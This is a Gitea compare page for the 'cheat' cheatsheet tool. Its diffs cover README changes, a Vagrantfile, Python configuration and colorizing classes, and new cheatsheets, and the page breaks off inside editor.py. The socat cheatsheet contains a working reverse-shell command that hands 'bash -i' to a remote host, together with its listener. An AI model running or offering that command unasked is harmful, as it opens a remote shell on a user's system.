mirror of
https://github.com/cheat/cheat.git
synced 2025-09-04 19:18:29 +02:00
Compare commits
93 Commits
Author | SHA1 | Date | |
---|---|---|---|
5487314676 | |||
ec360ccddd | |||
bb7dfd1028 | |||
b348724082 | |||
5053f07fd8 | |||
4dd55105d2 | |||
6148d64599 | |||
cde8bcaa1d | |||
fcb82778e4 | |||
da92421948 | |||
d6c7863573 | |||
5812bca6b7 | |||
074dba6e99 | |||
9d1dd15387 | |||
caf355f142 | |||
2728ce4757 | |||
6ae76799f7 | |||
0b523a769f | |||
f29cf03b68 | |||
4347114e19 | |||
edc67e7819 | |||
aa33a36491 | |||
8aac10dd8b | |||
9931b78c5f | |||
a37577ee85 | |||
3ad923eff0 | |||
ba47dc2cbc | |||
df21731c02 | |||
a657699a24 | |||
5793c1845a | |||
e2b5728283 | |||
d61e4e7c34 | |||
145a81dcd6 | |||
7c4fc54681 | |||
878d7e7e1b | |||
928637c9db | |||
ab87bb11c4 | |||
8f757d7735 | |||
c922ef4c8d | |||
574a7ec3c9 | |||
5ae49228b7 | |||
09acdf1a69 | |||
9ea60d12ff | |||
f7d747e101 | |||
3b207b4d51 | |||
5e1d3abce8 | |||
ad25e16dc6 | |||
92c07c0137 | |||
7e35263e90 | |||
1b6b5b79b7 | |||
b377984b59 | |||
e319332138 | |||
13c0ea7525 | |||
87448c49fa | |||
80b8cfc06b | |||
8a8f30679d | |||
4d19505b79 | |||
a2e028fd19 | |||
5eec6bf040 | |||
3a4c2a887d | |||
879a58b721 | |||
7814de96d2 | |||
a651426075 | |||
c4c935a6a5 | |||
df86142b8e | |||
60b05c8781 | |||
22b64d2d08 | |||
1224908445 | |||
28a2902e20 | |||
730c488854 | |||
ba9051e3cd | |||
7c7278ac8b | |||
e1fdca231e | |||
6b796adaf7 | |||
95843e4674 | |||
2b58300d84 | |||
bf1be86fb9 | |||
35c4a8d639 | |||
6910adae90 | |||
b47b4bc1d1 | |||
ea7e71b002 | |||
d576eef13b | |||
bec516b30a | |||
f0b3f8037b | |||
3938032595 | |||
f35cfa084e | |||
cdb22f310d | |||
6d1eff16a1 | |||
9241de04d6 | |||
8ac1851a69 | |||
c0fe871b33 | |||
d048ea5a10 | |||
761bf2eb2f |
3
.gitignore
vendored
3
.gitignore
vendored
@ -1,4 +1,7 @@
|
|||||||
|
*.log
|
||||||
*.pyc
|
*.pyc
|
||||||
|
.env
|
||||||
|
.vagrant
|
||||||
MANIFEST
|
MANIFEST
|
||||||
build
|
build
|
||||||
cheat.egg-info
|
cheat.egg-info
|
||||||
|
58
README.md
58
README.md
@ -83,37 +83,47 @@ with your [dotfiles][].
|
|||||||
Configuring
|
Configuring
|
||||||
-----------
|
-----------
|
||||||
|
|
||||||
### Setting a DEFAULT_CHEAT_DIR ###
|
### Setting a CHEAT_USER_DIR ###
|
||||||
Personal cheatsheets are saved in the `~/.cheat` directory by default, but you
|
Personal cheatsheets are saved in the `~/.cheat` directory by default, but you
|
||||||
can specify a different default by exporting a `DEFAULT_CHEAT_DIR` environment
|
can specify a different default by exporting a `CHEAT_USER_DIR` environment
|
||||||
variable:
|
variable:
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
export DEFAULT_CHEAT_DIR='/path/to/my/cheats'
|
export CHEAT_USER_DIR='/path/to/my/cheats'
|
||||||
```
|
```
|
||||||
|
|
||||||
### Setting a CHEATPATH ###
|
### Setting a CHEAT_PATH ###
|
||||||
You can additionally instruct `cheat` to look for cheatsheets in other
|
You can additionally instruct `cheat` to look for cheatsheets in other
|
||||||
directories by exporting a `CHEATPATH` environment variable:
|
directories by exporting a `CHEAT_PATH` environment variable:
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
export CHEATPATH='/path/to/my/cheats'
|
export CHEAT_PATH='/path/to/my/cheats'
|
||||||
```
|
```
|
||||||
|
|
||||||
You may, of course, append multiple directories to your `CHEATPATH`:
|
You may, of course, append multiple directories to your `CHEAT_PATH`:
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
export CHEATPATH="$CHEATPATH:/path/to/more/cheats"
|
export CHEAT_PATH="$CHEAT_PATH:/path/to/more/cheats"
|
||||||
```
|
```
|
||||||
|
|
||||||
You may view which directories are on your `CHEATPATH` with `cheat -d`.
|
You may view which directories are on your `CHEAT_PATH` with `cheat -d`.
|
||||||
|
|
||||||
### Enabling Syntax Highlighting ###
|
### Enabling Syntax Highlighting ###
|
||||||
`cheat` can optionally apply syntax highlighting to your cheatsheets. To enable
|
`cheat` can optionally apply syntax highlighting to your cheatsheets. To
|
||||||
syntax highlighting, export a `CHEATCOLORS` environment variable:
|
enable syntax highlighting, export a `CHEAT_COLORS` environment variable:
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
export CHEATCOLORS=true
|
export CHEAT_COLORS=true
|
||||||
|
```
|
||||||
|
|
||||||
|
Note that [pygments][] must be installed on your system for this to work.
|
||||||
|
|
||||||
|
`cheat` ships with both light and dark colorschemes to support terminals with
|
||||||
|
different background colors. A colorscheme may be selected via the
|
||||||
|
`CHEAT_COLORSCHEME` envvar:
|
||||||
|
|
||||||
|
```sh
|
||||||
|
export CHEAT_COLORSCHEME=light # must be 'light' (default) or 'dark'
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Specifying a Syntax Highlighter ####
|
#### Specifying a Syntax Highlighter ####
|
||||||
@ -134,6 +144,23 @@ WHERE id = 100
|
|||||||
If no syntax highlighter is specified, the `bash` highlighter will be used by
|
If no syntax highlighter is specified, the `bash` highlighter will be used by
|
||||||
default.
|
default.
|
||||||
|
|
||||||
|
### Enabling Search Match Highlighting ###
|
||||||
|
`cheat` can optionally be configured to highlight search term matches in search
|
||||||
|
results. To do so, export a `CHEAT_HIGHLIGHT` environment variable with a value
|
||||||
|
of one of the following:
|
||||||
|
|
||||||
|
- blue
|
||||||
|
- cyan
|
||||||
|
- green
|
||||||
|
- grey
|
||||||
|
- magenta
|
||||||
|
- red
|
||||||
|
- white
|
||||||
|
- yellow
|
||||||
|
|
||||||
|
Note that the `termcolor` module must be installed on your system for this to
|
||||||
|
work.
|
||||||
|
|
||||||
|
|
||||||
See Also:
|
See Also:
|
||||||
---------
|
---------
|
||||||
@ -141,8 +168,9 @@ See Also:
|
|||||||
- [Related Projects][related-projects]
|
- [Related Projects][related-projects]
|
||||||
|
|
||||||
|
|
||||||
[autocompletion]: https://github.com/chrisallenlane/cheat/wiki/Enabling-Command-line-Autocompletion
|
[autocompletion]: https://github.com/cheat/cheat/wiki/Enabling-Command-line-Autocompletion
|
||||||
[dotfiles]: http://dotfiles.github.io/
|
[dotfiles]: http://dotfiles.github.io/
|
||||||
[gfm]: https://help.github.com/articles/creating-and-highlighting-code-blocks/
|
[gfm]: https://help.github.com/articles/creating-and-highlighting-code-blocks/
|
||||||
[installing]: https://github.com/chrisallenlane/cheat/wiki/Installing
|
[installing]: https://github.com/cheat/cheat/wiki/Installing
|
||||||
[related-projects]: https://github.com/chrisallenlane/cheat/wiki/Related-Projects
|
[pygments]: http://pygments.org/
|
||||||
|
[related-projects]: https://github.com/cheat/cheat/wiki/Related-Projects
|
||||||
|
17
Vagrantfile
vendored
Normal file
17
Vagrantfile
vendored
Normal file
@ -0,0 +1,17 @@
|
|||||||
|
# -*- mode: ruby -*-
|
||||||
|
# vi: set ft=ruby :
|
||||||
|
|
||||||
|
Vagrant.configure("2") do |config|
|
||||||
|
config.vm.box = "ubuntu/bionic64"
|
||||||
|
|
||||||
|
config.vm.provider "virtualbox" do |vb|
|
||||||
|
vb.memory = "512"
|
||||||
|
end
|
||||||
|
|
||||||
|
config.vm.provision "shell", inline: <<-SHELL
|
||||||
|
sudo apt-get update
|
||||||
|
sudo apt-get install -y python-pip
|
||||||
|
su vagrant && sudo -H pip install docopt pygments termcolor flake8
|
||||||
|
cd /vagrant && sudo python setup.py install
|
||||||
|
SHELL
|
||||||
|
end
|
60
bin/cheat
60
bin/cheat
@ -13,7 +13,7 @@ Usage:
|
|||||||
cheat -v
|
cheat -v
|
||||||
|
|
||||||
Options:
|
Options:
|
||||||
-d --directories List directories on CHEATPATH
|
-d --directories List directories on $CHEAT_PATH
|
||||||
-e --edit Edit cheatsheet
|
-e --edit Edit cheatsheet
|
||||||
-l --list List cheatsheets
|
-l --list List cheatsheets
|
||||||
-s --search Search cheatsheets for <keyword>
|
-s --search Search cheatsheets for <keyword>
|
||||||
@ -35,31 +35,71 @@ Examples:
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
# require the dependencies
|
# require the dependencies
|
||||||
from cheat import sheets, sheet
|
from __future__ import print_function
|
||||||
from cheat.utils import colorize
|
from cheat.colorize import Colorize
|
||||||
|
from cheat.configuration import Configuration
|
||||||
|
from cheat.sheet import Sheet
|
||||||
|
from cheat.sheets import Sheets
|
||||||
|
from cheat.utils import Utils
|
||||||
from docopt import docopt
|
from docopt import docopt
|
||||||
|
import os
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
|
|
||||||
# parse the command-line options
|
# parse the command-line options
|
||||||
options = docopt(__doc__, version='cheat 2.3.1')
|
options = docopt(__doc__, version='cheat 2.5.1')
|
||||||
|
|
||||||
|
# initialize and validate configs
|
||||||
|
config = Configuration()
|
||||||
|
config.validate()
|
||||||
|
|
||||||
|
# create the CHEAT_USER_DIR if it does not exist
|
||||||
|
if not os.path.isdir(config.cheat_user_dir):
|
||||||
|
try:
|
||||||
|
os.mkdir(config.cheat_user_dir)
|
||||||
|
|
||||||
|
except OSError:
|
||||||
|
Utils.die("%s %s %s" % (
|
||||||
|
'Could not create CHEAT_USER_DIR (',
|
||||||
|
config.cheat_user_dir,
|
||||||
|
')')
|
||||||
|
)
|
||||||
|
|
||||||
|
# assert that the CHEAT_USER_DIR is readable and writable
|
||||||
|
if not os.access(config.cheat_user_dir, os.R_OK):
|
||||||
|
Utils.die("%s %s %s" % (
|
||||||
|
'The CHEAT_USER_DIR (',
|
||||||
|
config.cheat_user_dir,
|
||||||
|
') is not readable')
|
||||||
|
)
|
||||||
|
if not os.access(config.cheat_user_dir, os.W_OK):
|
||||||
|
Utils.die("%s %s %s" % (
|
||||||
|
'The CHEAT_USER_DIR (',
|
||||||
|
config.cheat_user_dir,
|
||||||
|
') is not writeable')
|
||||||
|
)
|
||||||
|
|
||||||
|
# bootsrap
|
||||||
|
sheets = Sheets(config)
|
||||||
|
sheet = Sheet(config, sheets)
|
||||||
|
colorize = Colorize(config)
|
||||||
|
|
||||||
# list directories
|
# list directories
|
||||||
if options['--directories']:
|
if options['--directories']:
|
||||||
print("\n".join(sheets.paths()))
|
print("\n".join(sheets.directories()))
|
||||||
|
|
||||||
# list cheatsheets
|
# list cheatsheets
|
||||||
elif options['--list']:
|
elif options['--list']:
|
||||||
print(sheets.list())
|
print(sheets.list(), end="")
|
||||||
|
|
||||||
# create/edit cheatsheet
|
# create/edit cheatsheet
|
||||||
elif options['--edit']:
|
elif options['--edit']:
|
||||||
sheet.create_or_edit(options['<cheatsheet>'])
|
sheet.edit(options['<cheatsheet>'])
|
||||||
|
|
||||||
# search among the cheatsheets
|
# search among the cheatsheets
|
||||||
elif options['--search']:
|
elif options['--search']:
|
||||||
print(colorize(sheets.search(options['<keyword>'])))
|
print(colorize.syntax(sheets.search(options['<keyword>'])), end="")
|
||||||
|
|
||||||
# print the cheatsheet
|
# print the cheatsheet
|
||||||
else:
|
else:
|
||||||
print(colorize(sheet.read(options['<cheatsheet>'])))
|
print(colorize.syntax(sheet.read(options['<cheatsheet>'])), end="")
|
||||||
|
8
bin/cheat.bat
Normal file
8
bin/cheat.bat
Normal file
@ -0,0 +1,8 @@
|
|||||||
|
@echo OFF
|
||||||
|
|
||||||
|
if not defined CHEAT_EDITOR if not defined EDITOR if not defined VISUAL (
|
||||||
|
set CHEAT_EDITOR=write
|
||||||
|
)
|
||||||
|
|
||||||
|
REM %~dp0 is black magic for getting directory of script
|
||||||
|
python %~dp0cheat %*
|
@ -1,3 +0,0 @@
|
|||||||
from . import sheet
|
|
||||||
from . import sheets
|
|
||||||
from . import utils
|
|
||||||
|
@ -1,4 +0,0 @@
|
|||||||
import os
|
|
||||||
|
|
||||||
def sheets_dir():
|
|
||||||
return os.path.split(__file__)
|
|
@ -15,5 +15,5 @@ convert original-image.jpg -resize 100x converted-image.png
|
|||||||
for file in `ls original/image/path/`;
|
for file in `ls original/image/path/`;
|
||||||
do new_path=${file%.*};
|
do new_path=${file%.*};
|
||||||
new_file=`basename $new_path`;
|
new_file=`basename $new_path`;
|
||||||
convert $file -resize 150 conerted/image/path/$new_file.png;
|
convert $file -resize 150 converted/image/path/$new_file.png;
|
||||||
done
|
done
|
||||||
|
@ -29,7 +29,7 @@ curl -C - -o partial_file.zip http://example.com/file.zip
|
|||||||
curl -I http://example.com
|
curl -I http://example.com
|
||||||
|
|
||||||
# Fetch your external IP and network info as JSON
|
# Fetch your external IP and network info as JSON
|
||||||
curl http://ifconfig.me/all/json
|
curl http://ifconfig.me/all.json
|
||||||
|
|
||||||
# Limit the rate of a download
|
# Limit the rate of a download
|
||||||
curl --limit-rate 1000B -O http://path.to.the/file
|
curl --limit-rate 1000B -O http://path.to.the/file
|
||||||
|
@ -10,7 +10,7 @@ gcc -g
|
|||||||
# Debug with all symbols.
|
# Debug with all symbols.
|
||||||
gcc -ggdb3
|
gcc -ggdb3
|
||||||
|
|
||||||
# Build for 64 bytes
|
# Build for 64 bits
|
||||||
gcc -m64
|
gcc -m64
|
||||||
|
|
||||||
# Include the directory {/usr/include/myPersonnal/lib/} to the list of path for #include <....>
|
# Include the directory {/usr/include/myPersonnal/lib/} to the list of path for #include <....>
|
||||||
|
@ -1,2 +1,5 @@
|
|||||||
# Lowercase all files and folders in current directory
|
# Lowercase all files and folders in current directory
|
||||||
rename 'y/A-Z/a-z/' *
|
rename 'y/A-Z/a-z/' *
|
||||||
|
|
||||||
|
# Replace 'sometext' with 'replacedby' in all files in current directory
|
||||||
|
rename 's/sometext/replacedby/' *
|
||||||
|
20
cheat/cheatsheets/scd
Normal file
20
cheat/cheatsheets/scd
Normal file
@ -0,0 +1,20 @@
|
|||||||
|
# To index recursively some paths for the very first run:
|
||||||
|
scd -ar ~/Documents/
|
||||||
|
|
||||||
|
# To change to a directory path matching "doc":
|
||||||
|
scd doc
|
||||||
|
|
||||||
|
# To change to a path matching all of "a", "b" and "c":
|
||||||
|
scd a b c
|
||||||
|
|
||||||
|
# To change to a directory path that ends with "ts":
|
||||||
|
scd "ts$"
|
||||||
|
|
||||||
|
# To show selection menu and ranking of 20 most likely directories:
|
||||||
|
scd -v
|
||||||
|
|
||||||
|
# To alias current directory as "xray":
|
||||||
|
scd --alias=xray
|
||||||
|
|
||||||
|
# To jump to a previously defined aliased directory:
|
||||||
|
scd xray
|
@ -3,3 +3,6 @@ scp foo.txt user@example.com:remote/dir
|
|||||||
|
|
||||||
# To copy a file from a remote server to your local machine:
|
# To copy a file from a remote server to your local machine:
|
||||||
scp user@example.com:remote/dir/foo.txt local/dir
|
scp user@example.com:remote/dir/foo.txt local/dir
|
||||||
|
|
||||||
|
# To scp a file over a SOCKS proxy on localhost and port 9999 (see ssh for tunnel setup):
|
||||||
|
scp -o "ProxyCommand nc -x 127.0.0.1:9999 -X 4 %h %p" file.txt username@example2.com:/tmp/
|
||||||
|
98
cheat/cheatsheets/snap
Normal file
98
cheat/cheatsheets/snap
Normal file
@ -0,0 +1,98 @@
|
|||||||
|
# To find the `foo` snap:
|
||||||
|
snap find foo
|
||||||
|
|
||||||
|
# To view detailed information about snap `foo`:
|
||||||
|
snap info foo
|
||||||
|
|
||||||
|
# To view all private snaps (must be logged in):
|
||||||
|
snap find --private
|
||||||
|
|
||||||
|
# To install the `foo` snap:
|
||||||
|
sudo snap install foo
|
||||||
|
|
||||||
|
# To install the `foo` snap from the "beta" channel:
|
||||||
|
sudo snap install foo --channel=beta
|
||||||
|
|
||||||
|
# To view installed snaps:
|
||||||
|
snap list
|
||||||
|
|
||||||
|
# To list all revisions of installed snaps:
|
||||||
|
snap list --all
|
||||||
|
|
||||||
|
# To (manually) update all snaps:
|
||||||
|
sudo snap refresh
|
||||||
|
|
||||||
|
# To (manually) update the `foo` snap:
|
||||||
|
sudo snap refresh foo
|
||||||
|
|
||||||
|
# To update the `foo` snap to the "beta" channel:
|
||||||
|
sudo snap refresh foo --channel=beta
|
||||||
|
|
||||||
|
# To revert the `foo` snap to a prior version:
|
||||||
|
sudo snap revert foo
|
||||||
|
|
||||||
|
# To revert the `foo` snap to revision 5:
|
||||||
|
snap revert foo --revision 5
|
||||||
|
|
||||||
|
# To remove the `foo` snap:
|
||||||
|
sudo snap remove foo
|
||||||
|
|
||||||
|
# To log in to snap (must first create account online):
|
||||||
|
sudo snap login
|
||||||
|
|
||||||
|
# To log out of snap:
|
||||||
|
snap logout
|
||||||
|
|
||||||
|
# To view a transaction log summary:
|
||||||
|
snap changes
|
||||||
|
|
||||||
|
# To view details of item 123 in the transaction log:
|
||||||
|
snap change 123
|
||||||
|
|
||||||
|
# To watch transaction 123:
|
||||||
|
snap watch 123
|
||||||
|
|
||||||
|
# To abort transaction 123:
|
||||||
|
snap abort 123
|
||||||
|
|
||||||
|
# To download the `foo` snap (and its assertions) *without* installing it:
|
||||||
|
snap download foo
|
||||||
|
|
||||||
|
# To install the locally-downloaded `foo` snap with assertions:
|
||||||
|
snap ack foo.assert
|
||||||
|
snap install foo.snap
|
||||||
|
|
||||||
|
# To install the locally-downloaded `foo` snap without assertions:
|
||||||
|
# NB: this is dangerous, because the integrity of the snap will not be
|
||||||
|
# verified. You should only do this to test a snap that you are currently
|
||||||
|
# developing.
|
||||||
|
snap install --dangerous foo.snap
|
||||||
|
|
||||||
|
# To install snap `foo` in "dev mode":
|
||||||
|
# NB: this is dangerous, and bypasses the snap sandboxing mechanisms
|
||||||
|
snap install --devmode foo
|
||||||
|
|
||||||
|
# To install snap `foo` in "classic mode":
|
||||||
|
# NB: this is likewise dangerous
|
||||||
|
snap install --classic foo
|
||||||
|
|
||||||
|
# To view available snap interfaces:
|
||||||
|
snap interfaces
|
||||||
|
|
||||||
|
# To connect the `foo:camera` plug to the ubuntu core slot:
|
||||||
|
snap connect foo:camera :camera
|
||||||
|
|
||||||
|
# To disconnect the `foo:camera` plug from the ubuntu core slot:
|
||||||
|
snap disconnect foo:camera
|
||||||
|
|
||||||
|
# To disable the `foo` snap
|
||||||
|
snap disable foo
|
||||||
|
|
||||||
|
# To enable the `foo` snap
|
||||||
|
snap enable foo
|
||||||
|
|
||||||
|
# To set snap `foo`'s `bar` property to 10:
|
||||||
|
snap set foo bar=10
|
||||||
|
|
||||||
|
# To read snap `foo`'s current `bar` property:
|
||||||
|
snap get foo bar
|
37
cheat/cheatsheets/socat
Normal file
37
cheat/cheatsheets/socat
Normal file
@ -0,0 +1,37 @@
|
|||||||
|
# socat connect to http-server (port 80 on 'butzel.info')
|
||||||
|
socat TCP4:butzel.info:80 -
|
||||||
|
|
||||||
|
# connect to https-server (port 443 on 'butzel.info' with tls)
|
||||||
|
socat openssl:butzel.info:443 -
|
||||||
|
|
||||||
|
# tcp-listener (port 3180), output as hexdump (-x) and fork for new connetions
|
||||||
|
socat -x tcp-listen:3180,fork -
|
||||||
|
|
||||||
|
# practical examples:
|
||||||
|
|
||||||
|
# complete real working http-example:
|
||||||
|
# (sleep is necessary to prevent socat closing socket before data received)
|
||||||
|
(echo -e "GET / HTTP/1.1\r\nHost: butzel.info\r\n\r" && sleep 1) \
|
||||||
|
| socat tcp4:butzel.info:80 -
|
||||||
|
|
||||||
|
# http to httpS 'Proxy' (for an webserver without TLS-Support)
|
||||||
|
socat OPENSSL-LISTEN:443,reuseaddr,pf=ip4,fork,cert=server.pem,cafile=client.crt,verify=0 TCP4-CONNECT:127.0.0.1:80
|
||||||
|
|
||||||
|
# port forwarding (e.g. own port 3180 to port 22(ssh) on target
|
||||||
|
socat TCP4-LISTEN:3180,reuseaddr,fork TCP4:butzel.info:ssh
|
||||||
|
|
||||||
|
# TOR-forwarding (needs tor-daemon on port 9050 running)
|
||||||
|
socat tcp4-listen:8080,reuseaddr,fork socks4A:127.0.0.1:t0rhidd3ns3rvice.onion:80,socksport=9050
|
||||||
|
|
||||||
|
# network (port 8266) to serial bridge (/dev/ttyUSB0 baudrate: 115200)
|
||||||
|
socat TCP4-LISTEN:8266,fork,reuseaddr /dev/ttyUSB0,raw,crnl,b115200
|
||||||
|
|
||||||
|
# udp to tcp
|
||||||
|
socat -u udp-recvfrom:1234,fork tcp:localhost:4321
|
||||||
|
|
||||||
|
# reverse shell:
|
||||||
|
socat exec:'bash -i',pty,stderr tcp:remote.butzel.info:3180
|
||||||
|
|
||||||
|
# listener for above reverse shell (on remote.butzel.info):
|
||||||
|
socat file:`tty`,raw,echo=0 tcp-listen:3180
|
||||||
|
# or: nc -lp 3180
|
@ -21,7 +21,10 @@ ssh -f -L 8080:remote.example.com:5000 user@personal.server.com -N
|
|||||||
ssh -X -t user@example.com 'chromium-browser'
|
ssh -X -t user@example.com 'chromium-browser'
|
||||||
|
|
||||||
# To create a SOCKS proxy on localhost and port 9999
|
# To create a SOCKS proxy on localhost and port 9999
|
||||||
ssh -D 9999 user@example.com
|
ssh -qND 9999 user@example.com
|
||||||
|
|
||||||
|
# To tunnel an ssh session over the SOCKS proxy on localhost and port 9999
|
||||||
|
ssh -o "ProxyCommand nc -x 127.0.0.1:9999 -X 4 %h %p" username@example2.com
|
||||||
|
|
||||||
# -X use an xsession, -C compress data, "-c blowfish" use the encryption blowfish
|
# -X use an xsession, -C compress data, "-c blowfish" use the encryption blowfish
|
||||||
ssh user@example.com -C -c blowfish -X
|
ssh user@example.com -C -c blowfish -X
|
||||||
|
@ -19,5 +19,5 @@ youtube-dl -s example.com/watch?v=id
|
|||||||
# To download audio in mp3 format with best quality available
|
# To download audio in mp3 format with best quality available
|
||||||
youtube-dl --extract-audio --audio-format mp3 --audio-quality 0 example.com/watch?v=id
|
youtube-dl --extract-audio --audio-format mp3 --audio-quality 0 example.com/watch?v=id
|
||||||
|
|
||||||
# For all video formats see
|
# For all video formats see link below (unfold "Comparison of YouTube media encoding options")
|
||||||
# http://en.wikipedia.org/wiki/YouTube#Quality_and_codecs
|
# https://en.wikipedia.org/w/index.php?title=YouTube&oldid=723160791#Quality_and_formats
|
||||||
|
65
cheat/colorize.py
Normal file
65
cheat/colorize.py
Normal file
@ -0,0 +1,65 @@
|
|||||||
|
from __future__ import print_function
|
||||||
|
import sys
|
||||||
|
|
||||||
|
|
||||||
|
class Colorize:
|
||||||
|
|
||||||
|
def __init__(self, config):
|
||||||
|
self._config = config
|
||||||
|
|
||||||
|
def search(self, needle, haystack):
|
||||||
|
""" Colorizes search results matched within a line """
|
||||||
|
|
||||||
|
# if a highlight color is not configured, exit early
|
||||||
|
if not self._config.cheat_highlight:
|
||||||
|
return haystack
|
||||||
|
|
||||||
|
# otherwise, attempt to import the termcolor library
|
||||||
|
try:
|
||||||
|
from termcolor import colored
|
||||||
|
|
||||||
|
# if the import fails, return uncolored text
|
||||||
|
except ImportError:
|
||||||
|
return haystack
|
||||||
|
|
||||||
|
# if the import succeeds, colorize the needle in haystack
|
||||||
|
return haystack.replace(needle,
|
||||||
|
colored(needle, self._config.cheat_highlight))
|
||||||
|
|
||||||
|
def syntax(self, sheet_content):
|
||||||
|
""" Applies syntax highlighting """
|
||||||
|
|
||||||
|
# only colorize if cheat_colors is true, and stdout is a tty
|
||||||
|
if self._config.cheat_colors is False or not sys.stdout.isatty():
|
||||||
|
return sheet_content
|
||||||
|
|
||||||
|
# don't attempt to colorize an empty cheatsheet
|
||||||
|
if not sheet_content.strip():
|
||||||
|
return ""
|
||||||
|
|
||||||
|
# otherwise, attempt to import the pygments library
|
||||||
|
try:
|
||||||
|
from pygments import highlight
|
||||||
|
from pygments.lexers import get_lexer_by_name
|
||||||
|
from pygments.formatters import TerminalFormatter
|
||||||
|
|
||||||
|
# if the import fails, return uncolored text
|
||||||
|
except ImportError:
|
||||||
|
return sheet_content
|
||||||
|
|
||||||
|
# otherwise, attempt to colorize
|
||||||
|
first_line = sheet_content.splitlines()[0]
|
||||||
|
lexer = get_lexer_by_name('bash')
|
||||||
|
|
||||||
|
# apply syntax-highlighting if the first line is a code-fence
|
||||||
|
if first_line.startswith('```'):
|
||||||
|
sheet_content = '\n'.join(sheet_content.split('\n')[1:-2])
|
||||||
|
try:
|
||||||
|
lexer = get_lexer_by_name(first_line[3:])
|
||||||
|
except Exception:
|
||||||
|
pass
|
||||||
|
|
||||||
|
return highlight(
|
||||||
|
sheet_content,
|
||||||
|
lexer,
|
||||||
|
TerminalFormatter(bg=self._config.cheat_colorscheme))
|
119
cheat/configuration.py
Normal file
119
cheat/configuration.py
Normal file
@ -0,0 +1,119 @@
|
|||||||
|
from cheat.utils import Utils
|
||||||
|
import json
|
||||||
|
import os
|
||||||
|
|
||||||
|
|
||||||
|
class Configuration:
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
# compute the location of the config files
|
||||||
|
config_file_path_global = self._select([
|
||||||
|
os.environ.get('CHEAT_GLOBAL_CONF_PATH'),
|
||||||
|
'/etc/cheat',
|
||||||
|
])
|
||||||
|
config_file_path_local = self._select([
|
||||||
|
os.environ.get('CHEAT_LOCAL_CONF_PATH'),
|
||||||
|
os.path.expanduser('~/.config/cheat/cheat'),
|
||||||
|
])
|
||||||
|
|
||||||
|
# attempt to read the global config file
|
||||||
|
config = {}
|
||||||
|
try:
|
||||||
|
config.update(self._read_config_file(config_file_path_global))
|
||||||
|
except Exception as e:
|
||||||
|
Utils.warn('Error while parsing global configuration: '
|
||||||
|
+ e.message)
|
||||||
|
|
||||||
|
# attempt to read the local config file
|
||||||
|
try:
|
||||||
|
config.update(self._read_config_file(config_file_path_local))
|
||||||
|
except Exception as e:
|
||||||
|
Utils.warn('Error while parsing local configuration: ' + e.message)
|
||||||
|
|
||||||
|
# With config files read, now begin to apply envvar overrides and
|
||||||
|
# default values
|
||||||
|
|
||||||
|
# self.cheat_colors
|
||||||
|
self.cheat_colors = self._select([
|
||||||
|
Utils.boolify(os.environ.get('CHEAT_COLORS')),
|
||||||
|
Utils.boolify(os.environ.get('CHEATCOLORS')),
|
||||||
|
Utils.boolify(config.get('CHEAT_COLORS')),
|
||||||
|
True,
|
||||||
|
])
|
||||||
|
|
||||||
|
# self.cheat_colorscheme
|
||||||
|
self.cheat_colorscheme = self._select([
|
||||||
|
os.environ.get('CHEAT_COLORSCHEME'),
|
||||||
|
config.get('CHEAT_COLORSCHEME'),
|
||||||
|
'light',
|
||||||
|
]).strip().lower()
|
||||||
|
|
||||||
|
# self.cheat_user_dir
|
||||||
|
self.cheat_user_dir = self._select(
|
||||||
|
map(os.path.expanduser,
|
||||||
|
filter(None,
|
||||||
|
[os.environ.get('CHEAT_USER_DIR'),
|
||||||
|
os.environ.get('CHEAT_DEFAULT_DIR'),
|
||||||
|
os.environ.get('DEFAULT_CHEAT_DIR'),
|
||||||
|
# TODO: XDG home?
|
||||||
|
os.path.join('~', '.cheat')])))
|
||||||
|
|
||||||
|
# self.cheat_editor
|
||||||
|
self.cheat_editor = self._select([
|
||||||
|
os.environ.get('CHEAT_EDITOR'),
|
||||||
|
os.environ.get('EDITOR'),
|
||||||
|
os.environ.get('VISUAL'),
|
||||||
|
config.get('CHEAT_EDITOR'),
|
||||||
|
'vi',
|
||||||
|
])
|
||||||
|
|
||||||
|
# self.cheat_highlight
|
||||||
|
self.cheat_highlight = self._select([
|
||||||
|
os.environ.get('CHEAT_HIGHLIGHT'),
|
||||||
|
config.get('CHEAT_HIGHLIGHT'),
|
||||||
|
False,
|
||||||
|
])
|
||||||
|
if isinstance(self.cheat_highlight, str):
|
||||||
|
Utils.boolify(self.cheat_highlight)
|
||||||
|
|
||||||
|
# self.cheat_path
|
||||||
|
self.cheat_path = self._select([
|
||||||
|
os.environ.get('CHEAT_PATH'),
|
||||||
|
os.environ.get('CHEATPATH'),
|
||||||
|
config.get('CHEAT_PATH'),
|
||||||
|
'/usr/share/cheat',
|
||||||
|
])
|
||||||
|
|
||||||
|
def _read_config_file(self, path):
|
||||||
|
""" Reads configuration file and returns list of set variables """
|
||||||
|
config = {}
|
||||||
|
if os.path.isfile(path):
|
||||||
|
with open(path) as config_file:
|
||||||
|
config.update(json.load(config_file))
|
||||||
|
return config
|
||||||
|
|
||||||
|
def _select(self, values):
|
||||||
|
for v in values:
|
||||||
|
if v is not None:
|
||||||
|
return v
|
||||||
|
|
||||||
|
def validate(self):
|
||||||
|
""" Validates configuration parameters """
|
||||||
|
|
||||||
|
# assert that cheat_highlight contains a valid value
|
||||||
|
highlights = [
|
||||||
|
'grey', 'red', 'green', 'yellow',
|
||||||
|
'blue', 'magenta', 'cyan', 'white',
|
||||||
|
False
|
||||||
|
]
|
||||||
|
if self.cheat_highlight not in highlights:
|
||||||
|
Utils.die("%s %s" %
|
||||||
|
('CHEAT_HIGHLIGHT must be one of:', highlights))
|
||||||
|
|
||||||
|
# assert that the color scheme is valid
|
||||||
|
colorschemes = ['light', 'dark']
|
||||||
|
if self.cheat_colorscheme not in colorschemes:
|
||||||
|
Utils.die("%s %s" %
|
||||||
|
('CHEAT_COLORSCHEME must be one of:', colorschemes))
|
||||||
|
|
||||||
|
return True
|
29
cheat/editor.py
Normal file
29
cheat/editor.py
Normal file
@ -0,0 +1,29 @@
|
|||||||
|
from __future__ import print_function
|
||||||
|
from cheat.utils import Utils
|
||||||
|
import subprocess
|
||||||
|
|
||||||
|
|
||||||
|
class Editor:
|
||||||
|
|
||||||
|
def __init__(self, config):
|
||||||
|
self._config = config
|
||||||
|
|
||||||
|
def editor(self):
|
